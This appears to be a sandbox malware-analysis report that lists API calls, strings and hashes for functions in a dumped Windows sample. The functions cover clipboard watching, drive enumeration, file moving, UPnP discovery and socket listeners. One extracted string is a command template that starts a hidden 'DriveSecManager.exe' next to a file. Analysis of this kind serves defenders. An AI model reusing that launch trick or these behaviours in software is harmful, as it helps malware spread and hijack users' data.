Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: _allshl_aullshr
String ID: Y
API String ID: 673498613-3233089245
Opcode ID: 94dc8271308eded007e7ea5b0fb9da388c093141b97384e1eb8e9f213d101719
Instruction ID: c2d4c50a35bfe5f8cd224c9e55e2257f54aee963b80b02c573e24d91c8b8cf0b
Opcode Fuzzy Hash: 94dc8271308eded007e7ea5b0fb9da388c093141b97384e1eb8e9f213d101719
Instruction Fuzzy Hash: 40D22A79D11619EFCB54CF99C18099EFBF1FF88360F62859AD845AB305C630AA91DF80

Function 00407B49 Relevance: 52.0, APIs: 34, Instructions: 1023
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_aullshr.NTDLL ref: 00407C1D
_allshl.NTDLL ref: 00407C36
_aullshr.NTDLL ref: 00407D04
_allshl.NTDLL ref: 00407D1D
_aullshr.NTDLL ref: 00407DE6
_allshl.NTDLL ref: 00407DFF
_aullshr.NTDLL ref: 00407EC8
_allshl.NTDLL ref: 00407EE1
_aullshr.NTDLL ref: 00407FAA
_allshl.NTDLL ref: 00407FC3
_aullshr.NTDLL ref: 00408086
_allshl.NTDLL ref: 0040809F
_aullshr.NTDLL ref: 00408162
_allshl.NTDLL ref: 0040817B
_aullshr.NTDLL ref: 0040823E
_allshl.NTDLL ref: 00408257
_aullshr.NTDLL ref: 0040831A
_allshl.NTDLL ref: 00408333
_aullshr.NTDLL ref: 004083F6
_allshl.NTDLL ref: 0040840F
_aullshr.NTDLL ref: 004084D2
_allshl.NTDLL ref: 004084EB
_aullshr.NTDLL ref: 004085AE
_allshl.NTDLL ref: 004085C7
_aullshr.NTDLL ref: 0040868A
_allshl.NTDLL ref: 004086A3
_aullshr.NTDLL ref: 00408766
_allshl.NTDLL ref: 0040877F
_aullshr.NTDLL ref: 00408842
_allshl.NTDLL ref: 0040885B
_aullshr.NTDLL ref: 00408918
_allshl.NTDLL ref: 00408931
_allshl.NTDLL ref: 00408952
_aullshr.NTDLL ref: 00408963

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: _allshl_aullshr
String ID:
API String ID: 673498613-0
Opcode ID: f562728b4ae2ad839a046a61e7ae0d2c61abff421672d19278971dcd63bd6e21
Instruction ID: bf2a4b6287689beed617d1f95a7506b70f8f7bc33f40ac888a8e51c3a2640481
Opcode Fuzzy Hash: f562728b4ae2ad839a046a61e7ae0d2c61abff421672d19278971dcd63bd6e21
Instruction Fuzzy Hash: 5FD22A79D11619EFCB54CF99C18099EFBF1FF88360F62859AD845AB305C630AA91DF80

Function 00406570 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNEL32(ok@,00000000), ref: 0040657F
wsprintfW.USER32 ref: 00406595
FindFirstFileW.KERNEL32(?,?), ref: 004065AC
lstrcmpW.KERNEL32(?,00411108), ref: 004065D1
lstrcmpW.KERNEL32(?,0041110C), ref: 004065E7
wsprintfW.USER32 ref: 0040660A
wsprintfW.USER32 ref: 0040662A
MoveFileExW.KERNEL32(?,?,00000009), ref: 00406666
FindNextFileW.KERNEL32(000000FF,?), ref: 0040667A
FindClose.KERNEL32(000000FF), ref: 0040668F
RemoveDirectoryW.KERNEL32(?), ref: 00406699

Strings

%s\*, xrefs: 00406589
ok@, xrefs: 0040657B, 0040661A, 0040657E, 0040661D
%s\%s, xrefs: 004065FE
%s\%s, xrefs: 0040661E

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
String ID: %s\%s$%s\%s$%s\*$ok@
API String ID: 92872011-32713442
Opcode ID: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
Instruction ID: 6b6780eb73bc58f0ce40e07c43f053b4d902fc918dfc6bbc5558198ff1b4ac31
Opcode Fuzzy Hash: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
Instruction Fuzzy Hash: AB3127B5900218AFCB10DB60EC89FDA7778BB48701F4085A9F609A3195DB75DAD4CF58

Function 00405970 Relevance: 25.7, APIs: 17, Instructions: 186
clipboardregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040597C
SetClipboardViewer.USER32(?), ref: 004059C8
SetWindowLongW.USER32(?,000000EB,?), ref: 004059DB
IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A30
OpenClipboard.USER32(00000000), ref: 00405A77
GetClipboardData.USER32(00000000), ref: 00405A89
RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B90
ChangeClipboardChain.USER32(?,?), ref: 00405B9E
DefWindowProcA.USER32(?,?,?,?), ref: 00405BB4

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
String ID:
API String ID: 3549449529-0
Opcode ID: 350a456a18ca66a485c2eebe1f768ad2515d325cb078b6b0c19f9934b7d85170
Instruction ID: 2c6a07511b676f4089081adff438ee2b95572153aa6d486a7a165f398962c3b3
Opcode Fuzzy Hash: 350a456a18ca66a485c2eebe1f768ad2515d325cb078b6b0c19f9934b7d85170
Instruction Fuzzy Hash: 9A711A74A00608EBDF14DFA4D988BAF77B4EF48301F14852AE505B6290D779AA80CF69

Function 00406BC0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 106sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 00406BCE
GetModuleFileNameW.KERNEL32(00000000,00415E58,00000104), ref: 00406BE0

Part of subcall function 0040E770: CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
Part of subcall function 0040E770: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
Part of subcall function 0040E770: CloseHandle.KERNEL32(000000FF), ref: 0040E7B2

ExitThread.KERNEL32 ref: 00406D4A

Part of subcall function 004063A0: GetLogicalDrives.KERNEL32 ref: 004063A6
Part of subcall function 004063A0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
Part of subcall function 004063A0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
Part of subcall function 004063A0: RegCloseKey.ADVAPI32(?), ref: 0040643E

Sleep.KERNEL32(00000BB8), ref: 00406D3D

Part of subcall function 004062C0: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406313

GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C7F
GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C94
_aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406CAF
wsprintfW.USER32 ref: 00406CC2
wsprintfW.USER32 ref: 00406CE2
wsprintfW.USER32 ref: 00406D05

Strings

(%dGB), xrefs: 00406CB6
%s%s, xrefs: 00406CF9
Unnamed volume, xrefs: 00406CD6

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
String ID: (%dGB)$%s%s$Unnamed volume
API String ID: 1650488544-2117135753
Opcode ID: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
Instruction ID: f0476b63a1379e6dca01d87e2afc3553bbde202c422fcd3a3a6a752a7ad43008
Opcode Fuzzy Hash: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
Instruction Fuzzy Hash: 53418471900318ABEB14DB94DD45FEE7778BB44700F1045A9F20AA51D0DB785B94CF6A

Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?), ref: 00402043
InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E

Part of subcall function 0040D130: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D14E

WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
setsockopt.WS2_32 ref: 004020D1
htons.WS2_32(?), ref: 00402101
bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
listen.WS2_32(?,7FFFFFFF), ref: 0040212F
WSACreateEvent.WS2_32 ref: 0040213A
WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E

Part of subcall function 0040D160: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
Part of subcall function 0040D160: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
Part of subcall function 0040D160: DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
Part of subcall function 0040D160: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
String ID:
API String ID: 1603358586-0
Opcode ID: 37cf53b06a8410454a1798d38201431a2759ba3d0e51bc8328308ef715640324
Instruction ID: bb6f584dfdc5104726d227d4109236b5a11985639f999f99e629cd7821b1dbc1
Opcode Fuzzy Hash: 37cf53b06a8410454a1798d38201431a2759ba3d0e51bc8328308ef715640324
Instruction Fuzzy Hash: 3F41B270640301ABD3209F749C4AF4B77E4AF48710F108A2DF669EA2D4E7F4E845875A

Function 0040D710 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117networkstringCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
htons.WS2_32(0000076C), ref: 0040D760
inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D

Part of subcall function 0040AA80: htons.WS2_32(00000050), ref: 0040AAAD
Part of subcall function 0040AA80: socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
Part of subcall function 0040AA80: connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
Part of subcall function 0040AA80: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18

bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805

Part of subcall function 0040D890: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
Part of subcall function 0040D890: Sleep.KERNEL32(000003E8), ref: 0040D8EE
Part of subcall function 0040D890: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
Part of subcall function 0040D890: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
Part of subcall function 0040D890: StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E

Strings

239.255.255.250, xrefs: 0040D76A

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
String ID: 239.255.255.250
API String ID: 726339449-2186272203
Opcode ID: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
Instruction ID: cd66526dcba05d1bd7c9b39ec2501b61c01db5f9fe0ef632d0235bd6d7545576
Opcode Fuzzy Hash: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
Instruction Fuzzy Hash: F64137B5E00208EBDB04DFE4D889BEEBBB5AF48304F108169E515B7390E7B45A44CB69

Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
htons.WS2_32(?), ref: 00401508
setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
bind.WS2_32(?,?,00000010), ref: 0040153B

Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C

CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
String ID:
API String ID: 4174406920-0
Opcode ID: 13d0b41af5316ea83091654edbd74b2561ef0770db19727e5a4322e68b78e0ff
Instruction ID: 37c3663fbc3c265b2fc21df898a790ae91858f9cd77d7d33374cf85f68206479
Opcode Fuzzy Hash: 13d0b41af5316ea83091654edbd74b2561ef0770db19727e5a4322e68b78e0ff
Instruction Fuzzy Hash: 0331C871A443016BE320DF649C46F9BB6E0AF48B10F50493DF655EB2D0D3B5D544879A

Function 0040CCF0 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040CD02
ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CD28
recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CD5F
GetTickCount.KERNEL32 ref: 0040CD74
Sleep.KERNEL32(00000001), ref: 0040CD94
GetTickCount.KERNEL32 ref: 0040CD9A

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: CountTick$Sleepioctlsocketrecv
String ID:
API String ID: 107502007-0
Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
Instruction ID: 0ae774020e9f5877292fe20f0fc2b5ec497076074ae846a5bd2c446efb985cc9
Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
Instruction Fuzzy Hash: 4431FC74900209EFCB04DFA8D988BEE7BB1FF44315F10867AE825A7290D7749A51CF95

Function 00406460 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040646B
CoCreateInstance.OLE32(00412438,00000000,00000001,00412418,?), ref: 00406483
wsprintfW.USER32 ref: 004064B6

Strings

%comspec%, xrefs: 004064BF
/c start %s & start %s\DriveSecManager.exe, xrefs: 004064AA

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: CreateInitializeInstancewsprintf
String ID: %comspec%$/c start %s & start %s\DriveSecManager.exe
API String ID: 2038452267-3640840557
Opcode ID: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
Instruction ID: 827debbb99fb5d40cfb779b5d8ae5ab415415813199b490bc36420c15ce2df05
Opcode Fuzzy Hash: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
Instruction Fuzzy Hash: 0C31D875A40208BFDB04DF98D884FDEB7B5EF88704F208199F619A73A4C674AE81CB54

Function 0040AA80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(00000050), ref: 0040AAAD

Part of subcall function 0040AA40: inet_addr.WS2_32(0040AAC1), ref: 0040AA4A
Part of subcall function 0040AA40: gethostbyname.WS2_32(?), ref: 0040AA5D

socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18

Strings

www.update.microsoft.com, xrefs: 0040AAB7

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
String ID: www.update.microsoft.com
API String ID: 4063137541-1705189816
Opcode ID: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
Instruction ID: 53d455f177803832f36bb1991f027e84745f2e467cc2e97abaa02536582c95dc
Opcode Fuzzy Hash: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
Instruction Fuzzy Hash: 09210BB5E103099BCB04DFE8D946AEEBBB5AF4C300F104169E605F7390E7745A45CBAA

Function 0040F0B1 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 0040F162

Strings

oA, xrefs: 0040F181
oA, xrefs: 0040F2C0
oA, xrefs: 0040F263

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID: oA$ oA$ oA
API String ID: 2850889275-3725432611
Opcode ID: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
Instruction ID: 156301bb8e4ac48afa8ff6eb2b3679a4760495b1ce114817f826733a91984271
Opcode Fuzzy Hash: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
Instruction Fuzzy Hash: 3561D635710612CFDB35CE29C88066A33A2EB85354B25857FD805EBAD5E73ADC4AC68C

Function 0040BE80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(Bz@,00000000,00000000,00000001,F0000040,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BE93
CryptGenRandom.ADVAPI32(Bz@,?,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEA9
CryptReleaseContext.ADVAPI32(Bz@,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEB5

Strings

Bz@, xrefs: 0040BE8F, 0040BEA5, 0040BEB1, 0040BE92, 0040BEA8, 0040BEB4

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID: Bz@
API String ID: 1815803762-793989200
Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
Instruction ID: 6606508483a264dc8c12e3925f56bba8ecc3e33b87176868a4d93c44792bd7d2
Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
Instruction Fuzzy Hash: 87E01275650208BBDB24CFD1EC49FDA776CEB48700F108154F70997280DBB5EA4097A8

Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
bind.WS2_32(?,?,00000010), ref: 00401429

Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C

CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
String ID:
API String ID: 3943618503-0
Opcode ID: 68d947c41bdf9a0382415b4c621d22e40d460daea97f1b1ba8e6dd9fd87ffbf0
Instruction ID: f9ba2cfc99a050ce4a8bfcbff2653574801cca82506c6568c29975d90a0f09d7
Opcode Fuzzy Hash: 68d947c41bdf9a0382415b4c621d22e40d460daea97f1b1ba8e6dd9fd87ffbf0
Instruction Fuzzy Hash: 61118974A417106FE320DF749C0AF877AE0AF04B54F50892DF699E72E1E3B49544879A

Function 0040D4A0 Relevance: 3.0, APIs: 2, Instructions: 15timenativeCOMMON

Download Yara Rule

APIs

NtQuerySystemTime.NTDLL(0040B3B5,?,0040B3B5,00000000), ref: 0040D4AA
RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: Time$QuerySecondsSince1980System
String ID:
API String ID: 1987401769-0
Opcode ID: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
Instruction ID: 284f4c0ca90a751934941b1d9bfeddc82ee070f17a0c71d7a2ad06256d95dcf5
Opcode Fuzzy Hash: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
Instruction Fuzzy Hash: 71D0C779D4010DBBCB00DBE4E84DCDDB77CEB44201F0086D6ED1593150EAB06658CBD5

Function 00404090 Relevance: 1.7, Strings: 1, Instructions: 488COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 0040411B

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
Instruction ID: 5fd1260cd0c1bb1f0d43ca887b35fd9fe7aa376b80e30ba4f5f1b1723d8df557
